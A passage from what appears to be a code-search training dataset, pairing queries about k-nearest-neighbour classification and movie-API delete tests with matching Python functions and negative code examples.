"def classify(self, testing_set):\n class_predictions = []\n class_actuals = []\n\n for attribute in testing_set.itertuples(index=False): # iterates through each attribute in the testing set\n class_probabilities = []\n actual_class = None\n\n for category in self.probability_table.keys():\n total_probability = 1\n category_probability = self.probability_table[category][\"Probability\"]\n\n for index in range(testing_set.shape[1]): # iterates through each index of the rows of the testing set\n column = testing_set.columns[index]\n val = attribute[index]\n\n if column != \"Class\" and val in self.probability_table[category][\"Attributes\"][column]:\n total_probability *= self.probability_table[category][\"Attributes\"][column][val]\n elif column != \"Class\" and val not in self.probability_table[category][\"Attributes\"][column]:\n self.probability_table[category][\"Attributes\"][column][val] = self._calculateAttributeProbability(0)\n total_probability *= self.probability_table[category][\"Attributes\"][column][val]\n elif column == \"Class\":\n actual_class = val\n\n total_probability = total_probability * category_probability\n class_probabilities.append((category, total_probability))\n classification = None\n highest_probability = 0\n\n for prob in class_probabilities:\n if prob[1] >= highest_probability:\n classification = prob[0]\n highest_probability = prob[1]\n\n class_predictions.append(classification)\n class_actuals.append(actual_class)\n\n return class_actuals, class_predictions",
"def predict(self, X: np.ndarray) -> np.ndarray:\n return np.array([self._classify(x) for x in X])",
"def predict(self, x, **kwargs):\n # compute predictions from different models of the ensemble\n predictions_list = np.array([classifier.predict(x) for classifier in self.ensemble_classifiers])\n # sum the probabilities across all predictors\n ensemble_predictions = np.sum(predictions_list, axis=0)\n return ensemble_predictions",
"def predict(self, x):\n labels = np.zeros((x.shape[0]), dtype=int)\n datasetLen=x.shape[0]\n miniResult=np.full(datasetLen,np.inf)\n # print(miniResult.shape)\n centersCopy=self.centers.copy()\n \n centerIndex=0\n for center in centersCopy:\n centerMatrix=np.tile(center,(datasetLen,1))\n result=np.square((x-centerMatrix))\n result=np.sum(result,axis=1) \n miniResult=np.minimum(miniResult,result)\n # print(miniResult)\n for i in range(miniResult.shape[0]):\n if(miniResult[i]==result[i]):\n labels[i]=centerIndex\n # print(labels)\n centerIndex+=1\n # for index in range(datasetLen):\n # data=x[index]\n # print(data.shape) \n\n ##################################\n # YOUR CODE GOES HERE #\n ##################################\n return labels",
"def predict(self, x):\n # Create an array to store predictions in. Add an extra dimension if this\n predictions = []\n # Loop over the cross-validation models\n for i, model in enumerate(self._models):\n\n # Make and store predictions\n predictions.append(model.predict(x).flatten())\n predictions=np.asarray(predictions)\n # Get the mean and standard deviation of predictions\n mean_preds = np.mean(predictions, axis = 0)\n stdev_preds = np.std(predictions, axis = 0)\n # Return the mean predictions and standard deviation of predictions\n return mean_preds, stdev_preds",
"def predict(self, x):\n predictionList=[]\n if self._model.loaded:\n for xValue in x:\n systemLabel=self._model.infer_topic(xValue)\n result=self._model.topicLabelling[systemLabel]\n predictionList.append(int(result))\n else:\n self._util.logError('TopicClusteringPredictionModel','Model needs to be loaded before prediction')\n\n return predictionList",
"def classify1(self,X):\n prediction = self.classify.predict(X)\n \n return prediction",
"def predict_proba(self, test_data, k):\r\n result = []\r\n\r\n for test_point in test_data:\r\n\r\n # Initializing probability array so that every class has atleast a non-zero probability\r\n prob_array = np.full((10,), 0.01)\r\n\r\n # Getting k nearest labels\r\n distances = self.l2_distance(test_point)\r\n k_nearest_indices = {}\r\n for i in range(len(distances)):\r\n if len(k_nearest_indices) != k:\r\n k_nearest_indices[i] = distances[i]\r\n else:\r\n max_index = max(k_nearest_indices, key=k_nearest_indices.get)\r\n if distances[i] < distances[max_index]:\r\n k_nearest_indices.pop(max_index)\r\n k_nearest_indices[i] = distances[i]\r\n labels = []\r\n for key in k_nearest_indices:\r\n labels.append(self.train_labels[key])\r\n\r\n # Getting prob_array for the individual test point\r\n for i in range(10):\r\n if labels.count(i) != 0:\r\n prob_array[i] = labels.count(i) / k\r\n result.append(prob_array)\r\n\r\n return result",
"def knn_predict(new_point, points, point_classes, k=5):\n k_nearest = find_nearest_neighbors(new_point, points, k)\n return majority_vote(point_classes[k_nearest])",
"def predict(self, test_set: list):\n trees = self.project.load_trees()\n # for cid in trees:\n # if cid not in test_set:\n # del trees[cid]\n results = []\n i = 0\n logger.info('predicting %d cascades ...', len(test_set))\n\n for cid in test_set:\n initial_tree = trees[cid].copy(self.initial_depth)\n res = self.predict_one_sample(initial_tree, self.threshold, self.graph, self.max_step)\n i += 1\n logger.info('%d cascades predicted', i)\n results.append(res)\n\n return results",
"def knnClassifier(Xtest, Xtrain, ytrain, k):\n Ntest = Xtest.shape[0]\n Ntrain = Xtrain.shape[0]\n Xtest = np.reshape(Xtest, (Ntest, -1))\n Xtrain = np.reshape(Xtrain, (Ntrain, -1))\n same = np.array_equal(Xtest, Xtrain)\n if same: # if train and test is same, account for over estimation of\n # performance by one more neighbour and zero weight to the first\n classifier = KNeighborsClassifier(n_neighbors = k+1, weights=_weight_func, \n algorithm='brute')\n classifier.fit(Xtrain, ytrain)\n pred = classifier.predict(Xtest)\n else:\n classifier = KNeighborsClassifier(n_neighbors = k, algorithm='brute')\n classifier.fit(Xtrain, ytrain)\n pred = classifier.predict(Xtest)\n return pred",
"def run(X_train, y_train, X_test, y_test, _k=[1]):\n # Compute distances:\n dists = mlBasics.compute_euclidean_distances(X_train, X_test)\n\n print \"Distances computed\"\n\n # For all k,\n for k in _k:\n\n # Predict labels\n y_test_pred = mlBasics.predict_labels(dists, y_train, k=k)\n\n print '{0:0.02f}'.format(np.mean(y_test_pred == y_test) * 100), \"of test examples classified correctly. k =\", key",
"def _predict_scores_fixed(self, X, **kwargs):\n # model = self._construct_scoring_model(n_objects)\n X = self.get_set_representation(X, kwargs)\n n_instances, n_objects, n_features = X.shape\n self.logger.info(\"After applying the set representations features {}\".format(n_features))\n input_layer_joint = Input(shape=(n_objects, n_features), name=\"input_joint_model\")\n scores = []\n\n inputs = [create_input_lambda(i)(input_layer_joint) for i in\n range(n_objects)]\n\n for i in range(n_objects):\n joint = inputs[i]\n for j in range(self.n_hidden_joint_layers):\n joint = self.joint_layers[j](joint)\n scores.append(self.scorer(joint))\n scores = concatenate(scores, name=\"final_scores\")\n joint_model = Model(inputs=input_layer_joint, outputs=scores)\n predicted_scores = joint_model.predict(X)\n self.logger.info(\"Done predicting scores\")\n return predicted_scores",
"def knnclassifier(xTr,yTr,xTe,k):\n if k > len(xTr):\n k = len(xTr)\n indices, distances = findknn(xTr,xTe,k)\n yTr = np.array(yTr)\n a = yTr[indices]\n preds = mode(a, axis=0)\n return preds[0].flatten()",
"def predict(self, X):\n proba = {}\n total_probabilities = np.array([])\n for classifier_index in range(1, 5):\n clf = self.classifiers[classifier_index]\n proba[classifier_index] = clf.predict_proba(X)[:, 1]\n for class_index in range(1, 6):\n if class_index == 1:\n # probability = 1 - probability(bigger than 1)\n total_probabilities = np.vstack(1 - proba[class_index])\n elif 1 < class_index < 5:\n # probability = probabillity(bigger than i) - probability(bigger than i-1)\n total_probabilities = np.column_stack((total_probabilities, (proba[class_index-1]-proba[class_index])))\n elif class_index == 5:\n # probability = probability(bigger than 4)\n total_probabilities = np.column_stack((total_probabilities, (proba[class_index-1])))\n # add one to the results because indexes start at 0, but classes range in (1 - 5)\n results = np.argmax(total_probabilities, axis=1) + 1\n return results",
"def knn(data_points, classes, k, threshold=-1):\n\tpoints = find_nn(data_points, k, threshold=threshold)\n\tnew_classes, miss_class = find_new_classes(points, classes)\n\tmiss_class = 0\n\tfor i in range(len(points)):\n\t\tif classes[points[i].point] != new_classes[i]:\n\t\t\tmiss_class += 1\n\treturn classes, miss_class / len(data_points)",
"def predict(self, X):\n probabilities = self.predict_probability(X)\n\n def classForProbability(probability):\n if probability > 0.5:\n return self.classOneLabel\n return self.classZeroLabel\n\n return numpy.array([\n classForProbability(p) for p in probabilities\n ])",
"def knn(training, test, k, output):\n\tpredicted = [] #the matrix holding the predicted outcomes using knn\n\tfor array1 in test:\n\t\toutcomes = defaultdict(int)\n\t\tdistances = {}\n\t\tmax_value = 0\n\t\tfor array2 in training:\n\t\t\tdistances[np.linalg.norm(array2[1:]-array1)] = array2\n\t\tdistances = sorted(distances.items())\n\t\tfor index in range(k):\n\t\t\tarray = distances[index][1]\n\t\t\t# print array, array[0], output[array[0]]\n\t\t\toutcomes[output[int(array[0])][0]] += 1\n\t\tfor key, value in outcomes.items():\n\t\t\tif value > max_value:\n\t\t\t\tmax_value = value\n\t\t\t\tmax_key = key\n\t\tpredicted.append(max_key)\n\treturn np.transpose(np.array([predicted]))",
"def predict(self, test_data, actual_labels):\n # Obtain cluster number for every test item\n classes = []\n\n cluster_no = self._min_dist_pos(test_data[0], self._centroids)\n\n for i, item in enumerate(test_data):\n cluster_no = self._min_dist_pos(item, self._centroids)\n classes.append(cluster_no)\n\n evaluator = ClassificationEvaluator(\n pred_labels = np.array(classes),\n actual_labels = actual_labels\n )\n\n metrics = evaluator.evaluate()\n return np.array(classes), metrics"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Computes the a posteriori probability p(wi|x) for each class wi by dividing the number of votes of each label among the k nearest neighbors by K.
|
def compute_a_posteriori(self, x):
# Compute label votes for k nearest neighbors.
knn_label_votes = self.knn_label_votes(x)
# p(wi|x) = num_votes(wi)/K. Map label index into probability.
return np.array(list(map(
lambda label: knn_label_votes.get(label, 0) / float(self.K),
range(self.num_classes),
)))
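
For quick reference alongside the record above, the sketch below restates the same estimator in a self-contained form: the posterior p(wi|x) is simply the fraction of the K nearest neighbours voting for class wi, so the returned vector sums to 1. This is a hedged, illustrative rewrite rather than the original class; the helper name knn_posterior and the toy data are assumptions made for the example.

import numpy as np

def knn_posterior(x, x_train, w_train, K, num_classes):
    # Indices of the K nearest training points under the L2 distance.
    dist = np.linalg.norm(x_train - x, axis=1)
    nearest = np.argsort(dist)[:K]
    # Vote counts per class, normalised by K so the vector sums to 1.
    votes = np.bincount(w_train[nearest], minlength=num_classes)
    return votes / float(K)

# Toy usage (data and labels are invented for the example).
rng = np.random.default_rng(0)
x_train = rng.normal(size=(100, 2))
w_train = (x_train[:, 0] > 0).astype(int)
posterior = knn_posterior(np.array([0.5, 0.0]), x_train, w_train, K=7, num_classes=2)
print(posterior, posterior.sum())  # posterior over the two classes; entries sum to 1.0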
|
[
"def knn(p, data, k):\n \n \"\"\" Steps:\n 1. Iterate through samples in data and store the \n distance from p in the dictionary \"distance\"; key is the \n distance, value is the sample.\n 2. Creat a sorted list of samples according to ascending\n order of the distances.\n 3. In the dictioary \"label_votes\", stores number of votes\n in each label among the top-k nearest samples\n 4. Assign p the most popular label\n \"\"\"\n\n max_label = util.LABELS[0]\n p.setLabel(max_label)\n # above forces a fixed label: remove them\n # replace knn_helper.knn(p, data, k) with your own logic\n print(p)\n knn_helper.knn(p, data, k)\n print(p)",
"def knn_label_votes(self, x):\n # Evaluate the distance L2 of x to all training points.\n dist = np.linalg.norm(x - self.x_train, axis=1)\n \n # Compute the indices of the k nearest points (with respect to x_train).\n # Use negative distances to force min-heap behave like a max-heap.\n nearest_k_indices = []\n for i in range(len(dist)):\n heapq.heappush(nearest_k_indices, (-dist[i], i))\n if len(nearest_k_indices) > self.K: heapq.heappop(nearest_k_indices)\n\n # Count number of votes for each label.\n label_votes = {}\n for label in [self.w_train[k] for (_, k) in nearest_k_indices]:\n label_votes[label] = label_votes.get(label, 0) + 1\n return label_votes",
"def knn_predict(new_point, points, point_classes, k=5):\n k_nearest = find_nearest_neighbors(new_point, points, k)\n return majority_vote(point_classes[k_nearest])",
"def predictkNNLabelsReg(closest_neighbors, y_train):\n total = 0;\n for i in range(len(closest_neighbors)):\n total = total + y_train[closest_neighbors[i]][0];\n LabelPrediction = total/len(closest_neighbors)\n return LabelPrediction",
"def knn(data_points, classes, k, threshold=-1):\n\tpoints = find_nn(data_points, k, threshold=threshold)\n\tnew_classes, miss_class = find_new_classes(points, classes)\n\tmiss_class = 0\n\tfor i in range(len(points)):\n\t\tif classes[points[i].point] != new_classes[i]:\n\t\t\tmiss_class += 1\n\treturn classes, miss_class / len(data_points)",
"def predict_proba(self, test_data, k):\r\n result = []\r\n\r\n for test_point in test_data:\r\n\r\n # Initializing probability array so that every class has atleast a non-zero probability\r\n prob_array = np.full((10,), 0.01)\r\n\r\n # Getting k nearest labels\r\n distances = self.l2_distance(test_point)\r\n k_nearest_indices = {}\r\n for i in range(len(distances)):\r\n if len(k_nearest_indices) != k:\r\n k_nearest_indices[i] = distances[i]\r\n else:\r\n max_index = max(k_nearest_indices, key=k_nearest_indices.get)\r\n if distances[i] < distances[max_index]:\r\n k_nearest_indices.pop(max_index)\r\n k_nearest_indices[i] = distances[i]\r\n labels = []\r\n for key in k_nearest_indices:\r\n labels.append(self.train_labels[key])\r\n\r\n # Getting prob_array for the individual test point\r\n for i in range(10):\r\n if labels.count(i) != 0:\r\n prob_array[i] = labels.count(i) / k\r\n result.append(prob_array)\r\n\r\n return result",
"def probability_labels(self, labels):\n\t\tlabels = labels[0]\n\t\tprobability = 1\n\t\tfor (i,j) in self.spans:\n\t\t\tif (i,j) in labels.keys():\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprobability = probability * 0.5\n\t\tself.probability = probability\n\t\treturn",
"def predict(self, x_set):\n def classify(x):\n # Pick top-voted label among the k nearest neighbors.\n label_votes = self.knn_label_votes(x)\n return max(label_votes, key=label_votes.get)\n\n return np.array(list(map(classify, x_set)))",
"def postal_problem():\n labels, points, testlabels, testpoints = np.load('PostalData.npz').items()\n\n y = [1,4,10]\n x = ['uniform','distance']\n for i in y:\n for j in x: \n nbrs = neighbors.KNeighborsClassifier(n_neighbors = i, weights = j)\n nbrs.fit(points[1], labels[1])\n prediction = nbrs.predict(testpoints[1])\n percent = np.average(prediction/testlabels[1])\n print \"n_neighbors = \" + str(i) + \", weights = \" + str(j) + \": \" + str(percent) + \"\\n\"",
"def label_probability(self,label):\n total = self.n\n quantity = 0\n for ex in self.data:\n if ex.label == label:\n quantity+=1\n prob = quantity/total\n return prob",
"def nb_predict(X, class_prob, class_word_prob):\r\n Ypred = []\r\n ###################################################\r\n # Q8.1 Edit here\r\n ###################################################\r\n for i in range(len(X)):\r\n listinx = X[i]\r\n tempp = []\r\n for indexclass in range(len(class_prob)):\r\n p = calculatelog(class_prob[indexclass])\r\n for j in range(len(listinx)):\r\n if class_word_prob[indexclass, listinx[j][0]] == -1:\r\n continue\r\n p += listinx[j][1] * calculatelog(class_word_prob[indexclass, listinx[j][0]])\r\n\r\n tempp.append(p)\r\n\r\n if(tempp[0] > tempp[1]):\r\n Ypred.append(0)\r\n else:\r\n Ypred.append(1)\r\n\r\n return Ypred",
"def nearest_neighbor_classify(train_image_feats,\n train_labels,\n test_image_feats,\n k=3):\n\n pred_labels = []\n\n #############################################################################\n # TODO: YOUR CODE HERE\n #############################################################################\n M, d = test_image_feats.shape\n dist = pairwise_distances(test_image_feats, train_image_feats)\n for i in range(M):\n sorted = np.argsort(dist[i])\n sorted = sorted[1:]\n list = [train_labels[i] for i in sorted[:k]]\n list_set = set(list)\n n = list.count\n pred_labels.append(max(list_set, key = n))\n \n #############################################################################\n # END OF YOUR CODE\n #############################################################################\n return pred_labels",
"def kfolds_making(dataset,label,K=10):\n #data = dataset-1\n #label = dataset-1\n dataset, label = shuffle(dataset, label, random_state=0)\n print(label)\n kfold_DT = KFold(K)\n\n performances_DT = 0\n performances_NN = 0\n performances_SVM = 0\n performances_KNN = 0\n #print()\n\n i=0\n for trn_idx, tst_idx in kfold_DT.split(dataset):\n print(i)\n i = i+1\n performances_DT = performances_DT + decision_tree2(dataset,label.ravel(),trn_idx,tst_idx)\n performances_NN = performances_NN + nn2(dataset,label.ravel(),trn_idx,tst_idx)\n performances_SVM = performances_SVM + svm2(dataset,label.ravel(),trn_idx,tst_idx)\n performances_KNN = performances_KNN + knn(dataset,label.ravel(),trn_idx,tst_idx)\n\n \n performances_DT = performances_DT/K\n performances_NN = performances_NN/K\n performances_SVM = performances_SVM/K\n performances_KNN = performances_KNN/K\n\n print(round(performances_DT, 3), \"accuracy for decision tree\")\n print(round(performances_NN, 3), \"accuracy for multi layer perceptron\")\n print(round(performances_SVM, 3), \"accuracy for support vector classifier \")\n print(round(performances_KNN, 3), \"accuracy for K nearest neighbors \")",
"def prob_atleast_k(num_balls, num_bins, k):\n bnded = pigeonhole_bounded( num_balls, num_bins, max_balls_per_bin = k-1)\n tot = pigeonhole( num_balls, num_bins )\n return 1 - bnded / tot",
"def __KNNAlgorithm(self, data):\r\n\r\n\t\t# get the list of distances to other values\r\n\t\tdistance_list = self.__get_distance_list(data)\r\n\t\t\r\n\t\t# take the classes of the closest k neighbors\r\n\t\tclosest_k_classes = [distance_list[i][1] for i in range(self.K)]\r\n\r\n\t\treturn self.__find_most_frequent(closest_k_classes)",
"def KNeighbors(self):\n\n name = \"KNeighbors\"\n knc = KNeighborsClassifier(n_neighbors=4)\n knc.fit(self.X_train, self.y_train)\n\n y_pred = knc.predict(self.X_test)\n\n print(\"K-Neighbours Classifier\")\n\n # Display results\n cv_scores = self._repr(knc, y_pred)\n\n # Save the file\n self.saveModel(knc, name)\n\n # Append value to the results\n self.results.append((name, cv_scores.mean()))\n\n return",
"def _compute_weights(labels: Collection):\n class_support = np.unique(labels, return_counts=True)[1]\n class_frequencies = class_support / len(labels)\n # Class weights are the inverse of the class frequencies\n class_weights = 1 / class_frequencies\n # Normalize vector to sum up to 1.0 (in case the Loss function does not do it)\n class_weights /= class_weights.sum()\n return class_weights",
"def knnclassifier(xTr,yTr,xTe,k):\n if k > len(xTr):\n k = len(xTr)\n indices, distances = findknn(xTr,xTe,k)\n yTr = np.array(yTr)\n a = yTr[indices]\n preds = mode(a, axis=0)\n return preds[0].flatten()",
"def test_predict_proba_classifier(self):\n\n neigh = KNeighborsClassifier(metric=lp_distance)\n\n neigh.fit(self.X, self.y)\n probs = neigh.predict_proba(self.X)\n\n np.testing.assert_array_almost_equal(probs, self.probs)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Finds the k nearest neighbors and counts their labels. Returns a dict mapping each label to its vote count.
|
def knn_label_votes(self, x):
# Evaluate the distance L2 of x to all training points.
dist = np.linalg.norm(x - self.x_train, axis=1)
# Compute the indices of the k nearest points (with respect to x_train).
# Use negative distances to force min-heap behave like a max-heap.
nearest_k_indices = []
for i in range(len(dist)):
heapq.heappush(nearest_k_indices, (-dist[i], i))
if len(nearest_k_indices) > self.K: heapq.heappop(nearest_k_indices)
# Count number of votes for each label.
label_votes = {}
for label in [self.w_train[k] for (_, k) in nearest_k_indices]:
label_votes[label] = label_votes.get(label, 0) + 1
return label_votes
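
A note on the record above: pushing negated distances onto a min-heap and popping whenever the heap grows past K keeps exactly the K smallest distances. The standalone check below is a hedged illustration with made-up data; only the selection logic mirrors knn_label_votes.

import heapq
import numpy as np

rng = np.random.default_rng(1)
dist = rng.random(20)
K = 5

# Bounded heap of (negated distance, index) pairs, as in knn_label_votes:
# whenever the heap exceeds K entries, the entry with the largest distance is popped.
heap = []
for i, d in enumerate(dist):
    heapq.heappush(heap, (-d, i))
    if len(heap) > K:
        heapq.heappop(heap)
kept = sorted(i for _, i in heap)

# Direct top-K selection for comparison.
expected = sorted(heapq.nsmallest(K, range(len(dist)), key=lambda i: dist[i]))
assert kept == expected
print(kept)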
|
[
"def predictkNNLabelsReg(closest_neighbors, y_train):\n total = 0;\n for i in range(len(closest_neighbors)):\n total = total + y_train[closest_neighbors[i]][0];\n LabelPrediction = total/len(closest_neighbors)\n return LabelPrediction",
"def neighbor_counts(living):\n n = collections.Counter()\n for x in map(neighbors, living):\n n.update(x)\n return dict(n)",
"def KNeighbors(self):\n\n name = \"KNeighbors\"\n knc = KNeighborsClassifier(n_neighbors=4)\n knc.fit(self.X_train, self.y_train)\n\n y_pred = knc.predict(self.X_test)\n\n print(\"K-Neighbours Classifier\")\n\n # Display results\n cv_scores = self._repr(knc, y_pred)\n\n # Save the file\n self.saveModel(knc, name)\n\n # Append value to the results\n self.results.append((name, cv_scores.mean()))\n\n return",
"def nearest_neighbor_classify(train_image_feats,\n train_labels,\n test_image_feats,\n k=3):\n\n pred_labels = []\n\n #############################################################################\n # TODO: YOUR CODE HERE\n #############################################################################\n M, d = test_image_feats.shape\n dist = pairwise_distances(test_image_feats, train_image_feats)\n for i in range(M):\n sorted = np.argsort(dist[i])\n sorted = sorted[1:]\n list = [train_labels[i] for i in sorted[:k]]\n list_set = set(list)\n n = list.count\n pred_labels.append(max(list_set, key = n))\n \n #############################################################################\n # END OF YOUR CODE\n #############################################################################\n return pred_labels",
"def knn(p, data, k):\n \n \"\"\" Steps:\n 1. Iterate through samples in data and store the \n distance from p in the dictionary \"distance\"; key is the \n distance, value is the sample.\n 2. Creat a sorted list of samples according to ascending\n order of the distances.\n 3. In the dictioary \"label_votes\", stores number of votes\n in each label among the top-k nearest samples\n 4. Assign p the most popular label\n \"\"\"\n\n max_label = util.LABELS[0]\n p.setLabel(max_label)\n # above forces a fixed label: remove them\n # replace knn_helper.knn(p, data, k) with your own logic\n print(p)\n knn_helper.knn(p, data, k)\n print(p)",
"def _count_neighbours(self):\n for point in self._points:\n self._neighbour_counter[point] += len(point.cluster.points)",
"def k_neighbors():\n train_x, test_x, train_y, test_y = prepare_data()\n train_y = train_y.reshape((train_y.shape[0], ))\n \n clf = KNeighborsClassifier(n_neighbors=3)\n \n start = time.time()\n clf.fit(train_x, train_y)\n end = time.time()\n\n y_pred = clf.predict(test_x)\n\n time_ = end - start\n accuracy = 100 * accuracy_score(test_y, y_pred)\n\n print(\"### KNN ###\\n\")\n print(\"Training lasted %.2f seconds\" % time_)\n print(\"Accuracy = %.2f\" % (accuracy))\n\n return(time_, accuracy)",
"def __KNNAlgorithm(self, data):\r\n\r\n\t\t# get the list of distances to other values\r\n\t\tdistance_list = self.__get_distance_list(data)\r\n\t\t\r\n\t\t# take the classes of the closest k neighbors\r\n\t\tclosest_k_classes = [distance_list[i][1] for i in range(self.K)]\r\n\r\n\t\treturn self.__find_most_frequent(closest_k_classes)",
"def get_neighbor_weights(gps_loc, N, k):\n\n weights = np.zeros((N, N))\n\n for i in xrange(N):\n # Finding the k-nearest neighbors.\n neighbors = np.vstack(sorted([(j, np.linalg.norm(gps_loc[i] - gps_loc[j])) for j in xrange(N)],\n key=lambda x: x[1])[1:k+1])[:, 0].astype('int')\n weights[i, neighbors] = 1\n\n return weights",
"def count_kmers(s, k):\n d = collections.defaultdict(int)\n for i in xrange(len(s)-(k-1)):\n d[s[i:i+k]] += 1\n return d",
"def test_kneighbors(self):\n\n nn = NearestNeighbors()\n nn.fit(self.X)\n\n knn = KNeighborsClassifier()\n knn.fit(self.X, self.y)\n\n knnr = KNeighborsRegressor()\n knnr.fit(self.X, self.modes_location)\n\n for neigh in [nn, knn, knnr]:\n\n dist, links = neigh.kneighbors(self.X[:4])\n\n np.testing.assert_array_equal(links, [[0, 7, 21, 23, 15],\n [1, 12, 19, 18, 17],\n [2, 17, 22, 27, 26],\n [3, 4, 9, 5, 25]])\n\n dist_kneigh = lp_distance(self.X[0], self.X[7])\n\n np.testing.assert_array_almost_equal(dist[0, 1], dist_kneigh)\n\n graph = neigh.kneighbors_graph(self.X[:4])\n\n for i in range(30):\n self.assertEqual(graph[0, i] == 1.0, i in links[0])\n self.assertEqual(graph[0, i] == 0.0, i not in links[0])",
"def get_class_number_and_key_dict(freq_dict, threshold = 50):\r\n labels_key = {}\r\n key_index = 0\r\n result = 0\r\n for label in freq_dict:\r\n if freq_dict[label] >= threshold:\r\n result = result + 1\r\n labels_key[label] = key_index\r\n key_index = key_index + 1\r\n\r\n N_CLASS = result\r\n print(\"Keys and Values are:\")\r\n\r\n for k, v in labels_key.items():\r\n print(k, \" :\", v)\r\n\r\n return result, labels_key",
"def keep_k_nearest(self):\n start = time.time()\n dist = self.compute_euclidean_distances()\n idx = dist.argsort()\n neighbours = idx[:, :self.knn + 1 ]\n dist_knn = np.zeros((self.n_data, self.n_data))\n for i in range(self.n_data):\n dist_knn[i, neighbours[i, :]] = dist[i, neighbours[i, :]]\n end = time.time()\n print(\"Compute keep k nearest: \" + \"{:.4f}\".format(end - start))\n return dist_knn",
"def classify_with_knn(data_set, labels, in_val, k=2):\n distance = find_euclidean_distance(array(data_set), array(in_val))\n values = zip(labels, distance)\n sorted_values = sorted(values, key=lambda value: value[1])\n if k > 0:\n sorted_values = sorted_values[:k]\n return sorted_values",
"def knn(data_points, classes, k, threshold=-1):\n\tpoints = find_nn(data_points, k, threshold=threshold)\n\tnew_classes, miss_class = find_new_classes(points, classes)\n\tmiss_class = 0\n\tfor i in range(len(points)):\n\t\tif classes[points[i].point] != new_classes[i]:\n\t\t\tmiss_class += 1\n\treturn classes, miss_class / len(data_points)",
"def predict_train_data(self, temp, train_index):\n neighbors = []\n k = [1, 9, 19, 29, 39, 49, 59, 69, 79, 89, 99]\n for neighbor in k:\n err_count = 0\n for i in range(len(neighbors), neighbor):\n neighbors.append(temp[i][1])\n dict = Counter(neighbors)\n dict = dict.most_common(1)[0][0]\n if not dict == self.train_label[train_index]:\n err_count += 1\n self.train_error[neighbor] += err_count",
"def num_labels(self):\n return len(self.get_label_keys(only_images=True))",
"def globalNeighbors (listAtom, count):\n\n for atom in listAtom:\n nbNeighbor = numberNeigthbor(atom[\"neighbors\"])\n for neighbor in atom[\"neighbors\"]:\n # print count\n neighbor_classif = structure.classificationATOM(neighbor)\n count[\"allNumberNeighbors\"][neighbor_classif] = count[\"allNumberNeighbors\"][neighbor_classif] + 1\n if not nbNeighbor in count.keys():\n count[nbNeighbor] = structure.countClassificationAtoms()\n\n if neighbor_classif in count[nbNeighbor].keys():\n count[nbNeighbor][neighbor_classif] = count[nbNeighbor][neighbor_classif] + 1\n\n else:\n count[nbNeighbor][\"others\"] = count[nbNeighbor][\"others\"] + 1",
"def num_labels(self): # -> int:\n ..."
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test delete movies endpoint
|
def test_delete_movies(self):
response = self.client.delete('/movies/1')
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertEqual(body['message'], 'Movie Successfully deleted.')
|
[
"def test_delete_movie(self):\n response = self.client.delete('/movies/0')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(body['message'], \"resource not found\")",
"def test_delete_valid(self):\n response = self.app.delete('/api/a/actors/Christopher Lloyd')\n self.assertEqual(response.status_code, 200)\n\n response = self.app.delete('/api/a/movies/Blind Date')\n self.assertEqual(response.status_code, 200)",
"def test_delete_invalid(self):\n response = self.app.delete('/api/a/actors/Bryant Collagauazo')\n self.assertEqual(response.status_code, 400)\n\n response = self.app.delete('/api/a/movies/The Life of Bryant Collaguazo')\n self.assertEqual(response.status_code, 400)",
"def delete_movies(request, movie_id, *args, **kwargs):\n try:\n movie = Movie.objects.filter(id=movie_id)\n if movie.exists():\n movie.delete()\n return Response({'msg': 'Movie deleted.'}, status=status.HTTP_200_OK)\n else:\n return Response({'msg': 'Movie does not exist.'}, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response({'msg': 'Some Execption Occured.', 'Execption': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)",
"def test_api_videos_id_delete(self):\n pass",
"def delete_movies():\n movie_id = int(request.args.get('id', 0))\n\n if not movie_id:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n\n try:\n with terminating_sn() as session:\n MoviesDao.delete_movie_from_db(session, movie_id)\n\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while deleting movie id {} from db\".format(movie_id))\n return ResponseMaker(ResponseMaker.RESPONSE_500).return_response(\n ResponseMaker.RESPONSE_500_MESSAGE)",
"def handle_movie_delete_request(name):\n name = name.replace(\"_\", \" \")\n if name in MOVIES:\n del MOVIES[name]\n return make_response(jsonify(\"Deleted Successfully\"), 201)\n else:\n return make_response(jsonify(\"Movie not in database.\"), 400)",
"def test_delete_index(self):\n index = self.client.get_index(uid=\"movies_uid\")\n response = index.delete()\n assert isinstance(response, object)",
"def test_delete_todo(self):\n response = self.app.delete('/api/v1/todos/1')\n self.assertEqual(response.status_code, 204)",
"def test_user_genre_delete_id_no_jwt(self, test_client, genre_test1):\n genre = GenreModel.query.filter_by(name=\"genre test\").first()\n response = test_client.delete(\n \"/api/user/genre/\"+str(genre_test1.genre_id))\n res = json.loads(response.data)\n\n assert response.status_code == 401\n assert res['msg'] == \"Missing Authorization Header\"",
"def test_delete_fighter(self):\n res = self.request.delete(\"http://127.0.0.1:8000/fighter/1/\")\n self.assertEqual(res.status_code,status.HTTP_200_OK)",
"def delete(self, request, movie_uuid):\n if not permission_check(request, role='SuperUser'):\n return access_denied()\n response = MovieHandlers().remove_movie(\n movie_uuid)\n return JsonResponse(response, safe=False)",
"def test_user_genre_delete_id_fake_jwt(self, test_client, headers_fake, genre_test1):\n response = test_client.delete(\n \"/api/user/genre/\"+str(genre_test1.genre_id), headers=headers_fake)\n res = json.loads(response.data)\n\n assert response.status_code == 404\n assert res['status'] == False",
"def test_delete_actors(self):\n response = self.client.delete('/actors/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Actor Successfully deleted.')",
